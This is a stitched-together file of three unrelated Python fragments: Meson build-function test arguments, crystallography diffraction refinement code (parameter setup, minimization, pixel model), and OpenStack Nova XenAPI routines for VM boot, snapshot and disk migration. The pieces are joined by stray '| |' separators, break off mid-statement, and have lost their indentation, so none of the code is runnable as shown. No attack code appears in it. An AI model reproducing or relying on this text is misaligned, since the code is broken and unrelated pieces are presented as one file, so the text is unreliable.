objects.Array[objects.Library] : f"[ library({RANDOM_STRING}, 'foo.c') ]",
objects.Array[objects.CustomTarget] : f"[custom_target({RANDOM_STRING}, output : 'bar.c', input : 'bar.txt', command : [ find_program('script.py'), '@INPUT@', '@OUTPUT@'])]",
objects.Array[Union[objects.String, objects.Number]] : "[ 'str', 2 ]",
objects.Array[Union[objects.String, objects.File]] : "[ files('foo.c')[0], 'bar.c' ]",
objects.Array[Union[objects.String, objects.Target]] : f"[ 'bar.c', build_target({RANDOM_STRING}, sources : ['foo.c'], target_type : 'executable') ]",
objects.Array[Union[objects.String, objects.File, objects.Target]] : f"[ files('foo.c')[0], 'bar.c', build_target({RANDOM_STRING}, sources : ['foo.c'], target_type : 'executable') ]",
objects.Array[Union[objects.Library, objects.CustomTarget]] : f"[ library({RANDOM_STRING}, 'foo.c') ]",
objects.Array[Union[objects.ExternalLibrary, objects.CustomTarget]] : "[ meson.get_compiler('c').find_library('m', required : false) ]",
objects.Array[Union[objects.IncludeDirectory, objects.String]] : "[ include_directories('include'), 'include' ]"
}
special = {
objects.String.join : {
"list_of_strings" : "[ 'str1', 'str2' ]"
},
objects.String.to_int : {
OBJECT : "'42'"
},
objects.Dict.get : {
"key" : "'foo'"
},
objects.Array.get : {
OBJECT : "[ 1, 2, 3]",
"index" : "0"
},
objects.Array.__getitem__ : {
OBJECT : "[ 1, 2, 3]",
"index" : "0"
},
objects.Compiler.alignment : {
"type_name" : "'int'",
"args" : "[]"
},
objects.Compiler.check_header : {
"header_name" : "'stdio.h'",
"dependencies" : "[]",
"prefix" : "''",
"required" : "false"
},
objects.Compiler.compute_int : {
"expr" : "'1 + 2'"
},
objects.Compiler.get_supported_function_attributes : {
"list_of_names" : "[ 'error' ]"
},
objects.Compiler.has_function_attribute : {
"name" : "'error'"
},
objects.Compiler.has_header : {
"header_name" : "'stdio.h'",
"dependencies" : "[]",
"prefix" : "''",
"args" : "[ '-Werror' ]",
("required", objects.Boolean) : "false"
},
objects.Compiler.has_header_symbol : {
"header_name" : "'stdio.h'",
"symbol_name" : "'printf'",
"dependencies" : "[]",
"prefix" : "''",
"args" : "[ '-Werror' ]",
("required", objects.Boolean) : "false"
},
objects.CustomTarget.__getitem__ : {
"index" : "0",
},
objects.Meson.get_compiler : {
"language" : "'c'"
},
objects.Meson.add_dist_script : {
("script_name", objects.String) : "'script.py'",
("script_name", objects.File) : "files('script.py')[0]"
},
objects.Meson.add_install_script : {
("script_name", objects.String) : "'script.py'",
("script_name", objects.File) : "files('script.py')[0]"
},
objects.Meson.add_postconf_script : {
("script_name", objects.String) : "'script.py'",
("script_name", objects.File) : "files('script.py')[0]"
},
objects.BuildTarget.extract_objects : {
"sources" : "'foo.c'"
},
objects.ConfigurationData.get : {
OBJECT : "configuration_data({ 'foo' : 1, 'bar' : false })",
"var_name" : "'foo'"
},
objects.ConfigurationData.get_unquoted : {
OBJECT : "configuration_data({ 'foo' : 1, 'bar' : false })",
"var_name" : "'foo'"
},
objects.Dependency.as_system : {
"value" : "'preserve'"
},
objects.Generator.process : {
"extra_args" : "[ 'bar' ]",
"preserve_path_from" : "'C:/'" if os.name == "nt" else "'/'"
},
objects.Range.__getitem__ : {
"index" : "0"
},
objects.BothLibraries.extract_objects : {
# https://mesonbuild.com/Build-targets.html#object-files
# No sources can be extracted in this simple template example
"sources" : "[]"
},
functions.add_global_arguments : {
("language", objects.String) : "'c'",
("language", objects.Array[objects.String]) : "['c', 'cpp']"
},
functions.add_global_link_arguments : {
("language", objects.String) : "'c'",
("language", objects.Array[objects.String]) : "['c', 'cpp']"
},
functions.add_languages : {
("langs", objects.String) : "'c'",
("langs", objects.Array[objects.String]) : "['c', 'cpp']"
},
functions.add_project_arguments : {
("language", objects.String) : "'c'",
("language", objects.Array[objects.String]) : "['c', 'cpp']"
},
functions.add_project_link_arguments : {
("language", objects.String) : "'c'",
("language", objects.Array[objects.String]) : "['c', 'cpp']"
},
functions.add_test_setup : {
("env", objects.Array[objects.String]) : "['key1=val1', 'key2=val2']",
("env", objects.Dict) : "{ 'key1' : 'value1', 'key2' : 'value2' }",
},
functions.benchmark : {
"name" : RANDOM_STRING,
("executable", objects.ExternalFile) : "files('script.py')[0]",
"workdir" : f"'{os.getcwd()}'",
"protocol" : "'exitcode'",
("env", objects.Array[objects.String]) : "['key1=val1', 'key2=val2']",
("env", objects.Dict) : "{ 'key1' : 'value1', 'key2' : 'value2' }",
},
functions.both_libraries : {
"library_name" : RANDOM_STRING,
("sources", objects.String) : "'foo.c'",
"install_mode" : "'rwxr-xr-x'",
"override_options" : "[ 'key1=value1', 'key2=value2' ]",
"link_whole" : f"[ static_library({RANDOM_STRING}, 'foo.c') ]",
"link_with": f"[ static_library({RANDOM_STRING}, 'foo.c') ]"
},
functions.build_target : {
"name" : RANDOM_STRING,
("sources", objects.String) : "'foo.c'",
"install_mode" : "'rwxr-xr-x'",
"override_options" : "[ 'key1=value1', 'key2=value2' ]",
"link_whole" : f"[ static_library({RANDOM_STRING}, 'foo.c') ]",
"link_with": f"[ static_library({RANDOM_STRING}, 'foo.c') ]",
"target_type" : "'executable'",
"win_subsystem" : "'console'",
"gnu_symbol_visibility" : "''",
"link_language" : "'c'"
},
functions.configuration_data : {
"dict" : "{ 'foo' : 1, 'bar' : false }"
},
functions.configure_file : {
"format" : "'meson'",
"output_format" : "'c'",
("depfile", objects.String) : "'foo.c'",
("input", objects.String) : "'bar.c'",
"install_mode" : "'rwxr-xr-x'"
},
functions.custom_target : {
"name" : RANDOM_STRING,
"install_mode" : "'rwxr-xr-x'",
("env", objects.Array[objects.String]) : "['key1=val1', 'key2=val2']",
("env", objects.Dict) : "{ 'key1' : 'value1', 'key2' : 'value2' }",
},
functions.declare_dependency : {
("variables", objects.Dict) : "{ 'key1' : 'value1', 'key2' : 'value2' }",
("variables", objects.Array[objects.String]) : "[ 'key1=value1', 'key2=value2' ]",
("include_directories", objects.String) : "'include'"
},
functions.dependency : {
"dependency_name" : "'netcdf'",
"language" : "'c'",
"method" : "'auto'",
"default_options" : "[ 'key1=value1', 'key2=value2' ]",
("fallback", objects.String) : "'foo_project'",
("fallback", objects.Array[objects.String]) : "[ 'foo_project', 'foo_dep' ]",
"required" : "false",
"include_type" : "'preserve'"
},
functions.error : {
"message" : | |
        init = self.params.init
sigma = self.params.sigmas
mins = self.params.mins
maxs = self.params.maxs
centers = self.params.centers
betas = self.params.betas
if not self.params.use_restraints or self.params.fix.ucell:
centers.ucell = [1,1,1,1,1,1]
betas.ucell = [1,1,1,1,1,1]
fix = self.params.fix
P = Parameters()
for i_xtal in range(self.SIM.num_xtals):
for ii in range(3):
p = ParameterType(init=0, sigma=sigma.RotXYZ[ii],
minval=mins.RotXYZ[ii], maxval=maxs.RotXYZ[ii],
fix=fix.RotXYZ, name="RotXYZ%d_xtal%d" % (ii,i_xtal),
center=centers.RotXYZ[ii], beta=betas.RotXYZ)
P.add(p)
p = ParameterType(init=init.G + init.G*0.01*i_xtal, sigma=sigma.G,
minval=mins.G, maxval=maxs.G,
fix=fix.G, name="G_xtal%d" %i_xtal,
center=centers.G, beta=betas.G)
P.add(p)
# these parameters are equal for all texture-domains within a crystal
fix_Nabc = [fix.Nabc]*3
if self.params.simulator.crystal.has_isotropic_ncells:
fix_Nabc = [fix_Nabc[0], True, True]
fix_difsig = [fix.diffuse_sigma]*3
if self.params.isotropic.diffuse_sigma:
fix_difsig = [fix_difsig[0], True, True]
fix_difgam = [fix.diffuse_gamma]*3
if self.params.isotropic.diffuse_gamma:
fix_difgam = [fix_difgam[0], True, True]
fix_eta = [fix.eta_abc]*3
if self.params.simulator.crystal.has_isotropic_mosaicity:
fix_eta = [fix_eta[0], True, True]
for ii in range(3):
# Mosaic domain tensor
p = ParameterType(init=init.Nabc[ii], sigma=sigma.Nabc[ii],
minval=mins.Nabc[ii], maxval=maxs.Nabc[ii],
fix=fix_Nabc[ii], name="Nabc%d" % (ii,),
center=centers.Nabc[ii], beta=betas.Nabc[ii])
P.add(p)
# diffuse gamma and sigma
p = ParameterType(init=init.diffuse_gamma[ii], sigma=sigma.diffuse_gamma[ii],
minval=mins.diffuse_gamma[ii], maxval=maxs.diffuse_gamma[ii],
fix=fix_difgam[ii], name="diffuse_gamma%d" % (ii,),
center=centers.diffuse_gamma[ii], beta=betas.diffuse_gamma[ii])
P.add(p)
p = ParameterType(init=init.diffuse_sigma[ii], sigma=sigma.diffuse_sigma[ii],
minval=mins.diffuse_sigma[ii], maxval=maxs.diffuse_sigma[ii],
fix=fix_difsig[ii], name="diffuse_sigma%d" % (ii,),
center=centers.diffuse_sigma[ii], beta=betas.diffuse_sigma[ii])
P.add(p)
# mosaic spread (mosaicity)
p = ParameterType(init=init.eta_abc[ii], sigma=sigma.eta_abc[ii],
minval=mins.eta_abc[ii], maxval=maxs.eta_abc[ii],
fix=fix_eta[ii], name="eta_abc%d" % (ii,),
center=centers.eta_abc[ii], beta=betas.eta_abc[ii])
P.add(p)
ucell_man = utils.manager_from_crystal(self.E.crystal)
ucell_vary_perc = self.params.ucell_edge_perc / 100.
for i_uc, (name, val) in enumerate(zip(ucell_man.variable_names, ucell_man.variables)):
if "Ang" in name:
minval = val - ucell_vary_perc * val
maxval = val + ucell_vary_perc * val
if centers.ucell is not None:
cent = centers.ucell[i_uc]
beta = betas.ucell[i_uc]
else:
if name == 'a_Ang':
cent = centers.ucell_a
beta = betas.ucell_a
elif name== 'b_Ang':
cent = centers.ucell_b
beta = betas.ucell_b
else:
cent = centers.ucell_c
beta = betas.ucell_c
assert cent is not None, "Set the center restraints properly!"
assert beta is not None
else:
val_in_deg = val * 180 / np.pi
minval = (val_in_deg - self.params.ucell_ang_abs) * np.pi / 180.
maxval = (val_in_deg + self.params.ucell_ang_abs) * np.pi / 180.
if centers.ucell is not None:
cent = centers.ucell[i_uc]*np.pi / 180.
beta = betas.ucell[i_uc]
else:
if name=='alpha_rad':
cent = centers.ucell_alpha
beta = betas.ucell_alpha
elif name=='beta_rad':
cent = centers.ucell_beta
beta = betas.ucell_beta
else:
cent = centers.ucell_gamma
beta = betas.ucell_gamma
assert cent is not None
assert beta is not None
cent = cent*np.pi / 180.
p = ParameterType(init=val, sigma=sigma.ucell[i_uc],
minval=minval, maxval=maxval, fix=fix.ucell,
name="ucell%d" % (i_uc,),
center=cent,
beta=beta)
MAIN_LOGGER.info(
"Unit cell variable %s (currently=%f) is bounded by %f and %f" % (name, val, minval, maxval))
P.add(p)
self.SIM.ucell_man = ucell_man
p = ParameterType(init=init.detz_shift*1e-3, sigma=sigma.detz_shift,
minval=mins.detz_shift*1e-3, maxval=maxs.detz_shift*1e-3,
fix=fix.detz_shift,name="detz_shift",
center=centers.detz_shift,
beta=betas.detz_shift)
P.add(p)
self.set_slices("roi_id") # this creates roi_id_unique
refls_have_scales = "scale_factor" in list(self.refls.keys())
for roi_id in self.roi_id_unique:
if refls_have_scales:
slc = self.roi_id_slices[roi_id][0]
refl_idx = int(self.all_refls_idx[slc][0])
init_scale = self.refls[refl_idx]["scale_factor"]
else:
init_scale = 1
p = ParameterType(init=init_scale, sigma=self.params.sigmas.roiPerScale,
minval=0, maxval=1e12,
fix=fix.perRoiScale, name="scale_roi%d" % roi_id,
center=1,
beta=1e12)
P.add(p)
self.SIM.P = P
# TODO , fix this attribute hacking
self.SIM.roi_id_unique = self.roi_id_unique
self.SIM.roi_id_slices = self.roi_id_slices
def get_data_model_pairs(self):
if self.best_model is None:
raise ValueError("cannot get the best model, there is no best_model attribute")
all_dat_img, all_mod_img = [], []
all_trusted = []
all_bragg = []
for i_roi in range(len(self.rois)):
x1, x2, y1, y2 = self.rois[i_roi]
mod = self.best_model[self.roi_id == i_roi].reshape((y2 - y1, x2 - x1))
if self.all_trusted is not None:
trusted = self.all_trusted[self.roi_id == i_roi].reshape((y2 - y1, x2 - x1))
all_trusted.append(trusted)
else:
all_trusted.append(None)
dat = self.all_data[self.roi_id == i_roi].reshape((y2 - y1, x2 - x1))
all_dat_img.append(dat)
if self.all_background is not None:
bg = self.all_background[self.roi_id == i_roi].reshape((y2-y1, x2-x1))
if self.best_model_includes_background:
all_bragg.append(mod-bg)
all_mod_img.append(mod)
else:
all_bragg.append(mod)
all_mod_img.append(mod+bg)
else: # assume mod contains background
all_mod_img.append(mod)
all_bragg.append(None)
return all_dat_img, all_mod_img, all_trusted, all_bragg
def Minimize(self, x0):
target = TargetFunc(SIM=self.SIM, niter_per_J=self.params.niter_per_J, profile=self.params.profile)
# set up the refinement flags
vary = np.ones(len(x0), bool)
assert len(x0) == len(self.SIM.P)
for p in self.SIM.P.values():
if not p.refine:
vary[p.xpos] = False
target.vary = vary # fixed flags
target.x0 = np.array(x0, np.float64) # initial full parameter list
x0_for_refinement = target.x0[vary]
if self.params.method is None:
method = "Nelder-Mead"
else:
method = self.params.method
maxfev = None
if self.params.nelder_mead_maxfev is not None:
maxfev = self.params.nelder_mead_maxfev * self.npix_total
at_min = target.at_minimum
if method in ["L-BFGS-B", "BFGS", "CG", "dogleg", "SLSQP", "Newton-CG", "trust-ncg", "trust-krylov", "trust-exact", "trust-ncg"]:
if self.SIM.P["RotXYZ0_xtal0"].refine:
self.SIM.D.refine(ROTX_ID)
self.SIM.D.refine(ROTY_ID)
self.SIM.D.refine(ROTZ_ID)
if self.SIM.P["Nabc0"].refine:
self.SIM.D.refine(NCELLS_ID)
if self.SIM.P["ucell0"].refine:
for i_ucell in range(len(self.SIM.ucell_man.variables)):
self.SIM.D.refine(UCELL_ID_OFFSET + i_ucell)
if self.SIM.P["eta_abc0"].refine:
self.SIM.D.refine(ETA_ID)
if self.SIM.P["detz_shift"].refine:
self.SIM.D.refine(DETZ_ID)
if self.SIM.D.use_diffuse:
self.SIM.D.refine(DIFFUSE_ID)
args = (self.SIM, self.pan_fast_slow, self.all_data,
self.all_sigmas, self.all_trusted, self.all_background, True, self.params, True)
min_kwargs = {'args': args, "method": method, "jac": target.jac,
'hess': self.params.hess}
if method=="L-BFGS-B":
min_kwargs["options"] = {"ftol": self.params.ftol, "gtol": 1e-10, "maxfun":1e5, "maxiter":self.params.lbfgs_maxiter}
else:
args = (self.SIM, self.pan_fast_slow, self.all_data,
self.all_sigmas, self.all_trusted, self.all_background, True, self.params, False)
min_kwargs = {'args': args, "method": method,
'options': {'maxfev': maxfev,
'fatol': self.params.nelder_mead_fatol}}
if self.params.global_method=="basinhopping":
HOPPER = basinhopping
out = HOPPER(target, x0_for_refinement,
niter=self.params.niter,
minimizer_kwargs=min_kwargs,
T=self.params.temp,
callback=at_min,
disp=False,
stepsize=self.params.stepsize)
else:
bounds = [(-100,100)] * len(x0_for_refinement) # TODO decide about bounds, usually x remains close to 1 during refinement
print("Beginning the annealing process")
args = min_kwargs.pop("args")
if self.params.dual.no_local_search:
compute_grads = args[-1]
if compute_grads:
print("Warning, parameters setup to compute gradients, swicthing off because no_local_search=True")
args = list(args)
args[-1] = False # switch off grad
args = tuple(args)
out = dual_annealing(target, bounds=bounds, args=args,
no_local_search=self.params.dual.no_local_search,
x0=x0_for_refinement,
accept=self.params.dual.accept,
visit=self.params.dual.visit,
maxiter=self.params.niter,
local_search_options=min_kwargs,
callback=at_min)
target.x0[vary] = out.x
return target.x0
def model(x, SIM, pfs, compute_grad=True):
#params_per_xtal = np.array_split(x[:num_per_xtal_params], SIM.num_xtals)
# get the unit cell variables
nucell = len(SIM.ucell_man.variables)
ucell_params = [SIM.P["ucell%d" % i_uc] for i_uc in range(nucell)]
ucell_xpos = [p.xpos for p in ucell_params]
unitcell_var_reparam = [x[xpos] for xpos in ucell_xpos]
unitcell_variables = [ucell_params[i].get_val(xval) for i, xval in enumerate(unitcell_var_reparam)]
SIM.ucell_man.variables = unitcell_variables
Bmatrix = SIM.ucell_man.B_recipspace
SIM.D.Bmatrix = Bmatrix
if compute_grad:
for i_ucell in range(len(unitcell_variables)):
SIM.D.set_ucell_derivative_matrix(
i_ucell + UCELL_ID_OFFSET,
SIM.ucell_man.derivative_matrices[i_ucell])
# update the mosaicity here
eta_params = [SIM.P["eta_abc%d" % i_eta] for i_eta in range(3)]
if SIM.umat_maker is not None:
# we are modeling mosaic spread
eta_abc = [p.get_val(x[p.xpos]) for p in eta_params]
if not SIM.D.has_anisotropic_mosaic_spread:
eta_abc = eta_abc[0]
SIM.update_umats_for_refinement(eta_abc)
# detector parameters
DetZ = SIM.P["detz_shift"]
x_shiftZ = x[DetZ.xpos]
shiftZ = DetZ.get_val(x_shiftZ)
SIM.D.shift_origin_z(SIM.detector, shiftZ)
# Mosaic block
Nabc_params = [SIM.P["Nabc%d" % (i_n,)] for i_n in range(3)]
Na, Nb, Nc = [n_param.get_val(x[n_param.xpos]) for n_param in Nabc_params]
if SIM.D.isotropic_ncells:
Nb = Na
Nc = Na
SIM.D.set_ncells_values(tuple([Na, Nb, Nc]))
# diffuse signals
if SIM.D.use_diffuse:
diffuse_params_lookup = {}
iso_flags = {'gamma':SIM.isotropic_diffuse_gamma, 'sigma':SIM.isotropic_diffuse_sigma}
for diff_type in ['gamma', 'sigma']:
diff_params = [SIM.P["diffuse_%s%d" % (diff_type,i_gam)] for i_gam in range(3)]
diffuse_params_lookup[diff_type] = diff_params
diff_vals = []
for i_diff, param in enumerate(diff_params):
val = param.get_val(x[param.xpos])
if iso_flags[diff_type]:
diff_vals = [val]*3
break
else:
diff_vals.append(val)
if diff_type == "gamma":
SIM.D.diffuse_gamma = tuple(diff_vals)
else:
SIM.D.diffuse_sigma = tuple(diff_vals)
npix = int(len(pfs) / 3)
nparam = len(x)
J = None
if compute_grad:
J = np.zeros((nparam, npix)) # gradients
model_pix = None
model_pix_noRoi = None
    # Extract the scale factors per ROI. These might correspond to structure factor intensity scale factors, and quite possibly might result in overfits!
roiScalesPerPix = 1
if SIM.P["scale_roi0"].refine:
perRoiParams = [SIM.P["scale_roi%d" % roi_id] for roi_id in SIM.roi_id_unique]
perRoiScaleFactors = [p.get_val(x[p.xpos]) for p in perRoiParams]
roiScalesPerPix = np.zeros(npix)
for i_roi, roi_id in enumerate(SIM.roi_id_unique):
slc = SIM.roi_id_slices[roi_id][0]
roiScalesPerPix[slc] = perRoiScaleFactors[i_roi]
for i_xtal in range(SIM.num_xtals):
SIM.D.raw_pixels_roi *= 0
RotXYZ_params = [SIM.P["RotXYZ%d_xtal%d" % (i_rot, i_xtal)] for i_rot in range(3)]
rotX,rotY,rotZ = [rot_param.get_val(x[rot_param.xpos]) for rot_param in RotXYZ_params]
## update parameters:
# TODO: if not refining Umat, assert these are 0 , and dont set them here
SIM.D.set_value(ROTX_ID, rotX)
SIM.D.set_value(ROTY_ID, rotY)
SIM.D.set_value(ROTZ_ID, rotZ)
G = SIM.P["G_xtal%d" % i_xtal]
scale = G.get_val(x[G.xpos])
SIM.D.add_diffBragg_spots(pfs)
pix_noRoiScale = SIM.D.raw_pixels_roi[:npix]
pix_noRoiScale = pix_noRoiScale.as_numpy_array()
pix = pix_noRoiScale * roiScalesPerPix
if model_pix is None:
model_pix = scale*pix
model_pix_noRoi = scale*pix_noRoiScale
else:
model_pix += scale*pix
model_pix_noRoi += scale*pix_noRoiScale
if compute_grad:
if G.refine:
scale_grad = pix # TODO double check multi crystal case
scale_grad = G.get_deriv(x[G.xpos], scale_grad)
J[G.xpos] += scale_grad
if RotXYZ_params[0].refine:
for i_rot in range(3):
rot_grad = scale * SIM.D.get_derivative_pixels(ROTXYZ_IDS[i_rot]).as_numpy_array()[:npix]
rot_p = RotXYZ_params[i_rot]
rot_grad = rot_p.get_deriv(x[rot_p.xpos], rot_grad)
J[rot_p.xpos] += rot_grad
if Nabc_params[0].refine:
Nabc_grads = SIM.D.get_ncells_derivative_pixels()
for i_n in range(3):
N_grad = scale*(Nabc_grads[i_n][:npix].as_numpy_array())
p = Nabc_params[i_n]
N_grad = p.get_deriv(x[p.xpos], N_grad)
J[p.xpos] += N_grad
if SIM.D.isotropic_ncells:
break
if SIM.D.use_diffuse:
for t in ['gamma','sigma']:
if diffuse_params_lookup[t][0].refine:
diffuse_grads = getattr(SIM.D,"get_diffuse_%s_derivative_pixels"%t)()
for i_diff | |
userdevice += 1
else:
if instance.auto_disk_config:
LOG.debug(_("Auto configuring disk, attempting to "
"resize partition..."), instance=instance)
instance_type = db.instance_type_get(ctx,
instance.instance_type_id)
VMHelper.auto_configure_disk(self._session,
first_vdi_ref,
instance_type['root_gb'])
VMHelper.create_vbd(self._session, vm_ref, first_vdi_ref,
userdevice, bootable=True)
# set user device to next free value
# userdevice 1 is reserved for rescue and we've used '0'
userdevice = 2
instance_type = db.instance_type_get(ctx, instance.instance_type_id)
swap_mb = instance_type['swap']
generate_swap = swap_mb and FLAGS.xenapi_generate_swap
if generate_swap:
VMHelper.generate_swap(self._session, instance,
vm_ref, userdevice, swap_mb)
userdevice += 1
ephemeral_gb = instance_type['ephemeral_gb']
if ephemeral_gb:
VMHelper.generate_ephemeral(self._session, instance,
vm_ref, userdevice, ephemeral_gb)
userdevice += 1
# Attach any other disks
for vdi in vdis[1:]:
vdi_ref = self._session.call_xenapi('VDI.get_by_uuid',
vdi['vdi_uuid'])
if generate_swap and vdi['vdi_type'] == 'swap':
# We won't be using it, so don't let it leak
VMHelper.destroy_vdi(self._session, vdi_ref)
continue
VMHelper.create_vbd(self._session, vm_ref, vdi_ref,
userdevice, bootable=False)
userdevice += 1
def _boot_new_instance(self, instance, vm_ref):
"""Boot a new instance and configure it."""
LOG.debug(_('Starting VM'), instance=instance)
self._start(instance, vm_ref)
ctx = nova_context.get_admin_context()
agent_build = db.agent_build_get_by_triple(ctx, 'xen',
instance.os_type, instance.architecture)
if agent_build:
LOG.info(_('Latest agent build for %(hypervisor)s/%(os)s'
'/%(architecture)s is %(version)s') % agent_build)
else:
LOG.info(_('No agent build found for %(hypervisor)s/%(os)s'
'/%(architecture)s') % {
'hypervisor': 'xen',
'os': instance.os_type,
'architecture': instance.architecture})
# Wait for boot to finish
LOG.debug(_('Waiting for instance state to become running'),
instance=instance)
expiration = time.time() + FLAGS.xenapi_running_timeout
while time.time() < expiration:
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
break
greenthread.sleep(0.5)
# Update agent, if necessary
# This also waits until the agent starts
LOG.debug(_("Querying agent version"), instance=instance)
version = self._get_agent_version(instance)
if version:
LOG.info(_('Instance agent version: %s'), version,
instance=instance)
if (version and agent_build and
cmp_version(version, agent_build['version']) < 0):
LOG.info(_('Updating Agent to %s'), agent_build['version'],
instance=instance)
self._agent_update(instance, agent_build['url'],
agent_build['md5hash'])
# if the guest agent is not available, configure the
# instance, but skip the admin password configuration
no_agent = version is None
# Inject files, if necessary
injected_files = instance.injected_files
if injected_files:
# Check if this is a JSON-encoded string and convert if needed.
if isinstance(injected_files, basestring):
try:
injected_files = json.loads(injected_files)
except ValueError:
LOG.exception(_("Invalid value for injected_files: %r"),
injected_files, instance=instance)
injected_files = []
# Inject any files, if specified
for path, contents in instance.injected_files:
LOG.debug(_("Injecting file path: '%s'") % path,
instance=instance)
self.inject_file(instance, path, contents)
admin_password = instance.admin_pass
# Set admin password, if necessary
if admin_password and not no_agent:
LOG.debug(_("Setting admin password"), instance=instance)
self.set_admin_password(instance, admin_password)
# Reset network config
LOG.debug(_("Resetting network"), instance=instance)
self.reset_network(instance, vm_ref)
# Set VCPU weight
inst_type = db.instance_type_get(ctx, instance.instance_type_id)
vcpu_weight = inst_type['vcpu_weight']
if vcpu_weight is not None:
LOG.debug(_("Setting VCPU weight"), instance=instance)
self._session.call_xenapi('VM.add_to_VCPUs_params', vm_ref,
'weight', str(vcpu_weight))
def _get_vm_opaque_ref(self, instance):
vm_ref = VMHelper.lookup(self._session, instance['name'])
if vm_ref is None:
raise exception.NotFound(_('Could not find VM with name %s') %
instance['name'])
return vm_ref
def _acquire_bootlock(self, vm):
"""Prevent an instance from booting."""
self._session.call_xenapi(
"VM.set_blocked_operations",
vm,
{"start": ""})
def _release_bootlock(self, vm):
"""Allow an instance to boot."""
self._session.call_xenapi(
"VM.remove_from_blocked_operations",
vm,
"start")
def snapshot(self, context, instance, image_id):
"""Create snapshot from a running VM instance.
:param context: request context
:param instance: instance to be snapshotted
:param image_id: id of image to upload to
Steps involved in a XenServer snapshot:
1. XAPI-Snapshot: Snapshotting the instance using XenAPI. This
creates: Snapshot (Template) VM, Snapshot VBD, Snapshot VDI,
Snapshot VHD
2. Wait-for-coalesce: The Snapshot VDI and Instance VDI both point to
a 'base-copy' VDI. The base_copy is immutable and may be chained
with other base_copies. If chained, the base_copies
coalesce together, so, we must wait for this coalescing to occur to
get a stable representation of the data on disk.
3. Push-to-glance: Once coalesced, we call a plugin on the XenServer
that will bundle the VHDs together and then push the bundle into
Glance.
"""
template_vm_ref = None
try:
_snapshot_info = self._create_snapshot(instance)
template_vm_ref, template_vdi_uuids = _snapshot_info
# call plugin to ship snapshot off to glance
VMHelper.upload_image(context,
self._session, instance, template_vdi_uuids, image_id)
finally:
if template_vm_ref:
self._destroy(instance, template_vm_ref,
destroy_kernel_ramdisk=False)
LOG.debug(_("Finished snapshot and upload for VM"),
instance=instance)
def _create_snapshot(self, instance):
#TODO(sirp): Add quiesce and VSS locking support when Windows support
# is added
LOG.debug(_("Starting snapshot for VM"), instance=instance)
vm_ref = self._get_vm_opaque_ref(instance)
label = "%s-snapshot" % instance.name
try:
template_vm_ref, template_vdi_uuids = VMHelper.create_snapshot(
self._session, instance, vm_ref, label)
return template_vm_ref, template_vdi_uuids
except self.XenAPI.Failure, exc:
LOG.error(_("Unable to Snapshot instance: %(exc)s"), locals(),
instance=instance)
raise
def _migrate_vhd(self, instance, vdi_uuid, dest, sr_path):
instance_uuid = instance['uuid']
params = {'host': dest,
'vdi_uuid': vdi_uuid,
'instance_uuid': instance_uuid,
'sr_path': sr_path}
try:
_params = {'params': pickle.dumps(params)}
self._session.call_plugin('migration', 'transfer_vhd',
_params)
except self.XenAPI.Failure:
msg = _("Failed to transfer vhd to new host")
raise exception.MigrationError(reason=msg)
def _get_orig_vm_name_label(self, instance):
return instance.name + '-orig'
def _update_instance_progress(self, context, instance, step, total_steps):
"""Update instance progress percent to reflect current step number
"""
# FIXME(sirp): for now we're taking a KISS approach to instance
# progress:
# Divide the action's workflow into discrete steps and "bump" the
# instance's progress field as each step is completed.
#
# For a first cut this should be fine, however, for large VM images,
# the _create_disks step begins to dominate the equation. A
# better approximation would use the percentage of the VM image that
# has been streamed to the destination host.
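        # For example, if RESIZE_TOTAL_STEPS were 5, finishing step 2 would
        # report round(float(2) / 5 * 100) = 40 percent.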
progress = round(float(step) / total_steps * 100)
instance_uuid = instance['uuid']
LOG.debug(_("Updating progress to %(progress)d"), locals(),
instance=instance)
db.instance_update(context, instance_uuid, {'progress': progress})
def migrate_disk_and_power_off(self, context, instance, dest,
instance_type):
"""Copies a VHD from one host machine to another, possibly
resizing filesystem before hand.
:param instance: the instance that owns the VHD in question.
:param dest: the destination host machine.
:param disk_type: values are 'primary' or 'cow'.
"""
# 0. Zero out the progress to begin
self._update_instance_progress(context, instance,
step=0,
total_steps=RESIZE_TOTAL_STEPS)
vm_ref = self._get_vm_opaque_ref(instance)
# The primary VDI becomes the COW after the snapshot, and we can
# identify it via the VBD. The base copy is the parent_uuid returned
# from the snapshot creation
base_copy_uuid = cow_uuid = None
template_vdi_uuids = template_vm_ref = None
try:
# 1. Create Snapshot
_snapshot_info = self._create_snapshot(instance)
template_vm_ref, template_vdi_uuids = _snapshot_info
self._update_instance_progress(context, instance,
step=1,
total_steps=RESIZE_TOTAL_STEPS)
base_copy_uuid = template_vdi_uuids['image']
_vdi_info = VMHelper.get_vdi_for_vm_safely(self._session, vm_ref)
vdi_ref, vm_vdi_rec = _vdi_info
cow_uuid = vm_vdi_rec['uuid']
sr_path = VMHelper.get_sr_path(self._session)
if (instance['auto_disk_config'] and
instance['root_gb'] > instance_type['root_gb']):
# Resizing disk storage down
old_gb = instance['root_gb']
new_gb = instance_type['root_gb']
LOG.debug(_("Resizing down VDI %(cow_uuid)s from "
"%(old_gb)dGB to %(new_gb)dGB"), locals(),
instance=instance)
# 2. Power down the instance before resizing
self._shutdown(instance, vm_ref, hard=False)
self._update_instance_progress(context, instance,
step=2,
total_steps=RESIZE_TOTAL_STEPS)
# 3. Copy VDI, resize partition and filesystem, forget VDI,
# truncate VHD
new_ref, new_uuid = VMHelper.resize_disk(self._session,
instance,
vdi_ref,
instance_type)
self._update_instance_progress(context, instance,
step=3,
total_steps=RESIZE_TOTAL_STEPS)
# 4. Transfer the new VHD
self._migrate_vhd(instance, new_uuid, dest, sr_path)
self._update_instance_progress(context, instance,
step=4,
total_steps=RESIZE_TOTAL_STEPS)
# Clean up VDI now that it's been copied
VMHelper.destroy_vdi(self._session, new_ref)
vdis = {'base_copy': new_uuid}
else:
# Resizing disk storage up, will be handled on destination
# As an optimization, we transfer the base VDI first,
                # then shut down the VM, followed by transferring the COW
# VDI.
# 2. Transfer the base copy
self._migrate_vhd(instance, base_copy_uuid, dest, sr_path)
self._update_instance_progress(context, instance,
step=2,
total_steps=RESIZE_TOTAL_STEPS)
# 3. Now power down the instance
self._shutdown(instance, vm_ref, hard=False)
self._update_instance_progress(context, instance,
step=3,
total_steps=RESIZE_TOTAL_STEPS)
# 4. Transfer the COW VHD
self._migrate_vhd(instance, cow_uuid, dest, sr_path)
self._update_instance_progress(context, instance,
step=4,
total_steps=RESIZE_TOTAL_STEPS)
# TODO(mdietz): we could also consider renaming these to
# something sensible so we don't need to blindly pass
# around dictionaries
vdis = {'base_copy': base_copy_uuid, 'cow': cow_uuid}
# NOTE(sirp): in case we're resizing to the same host (for dev
# purposes), apply a suffix to name-label so the two VM records
# extant until a confirm_resize don't collide.
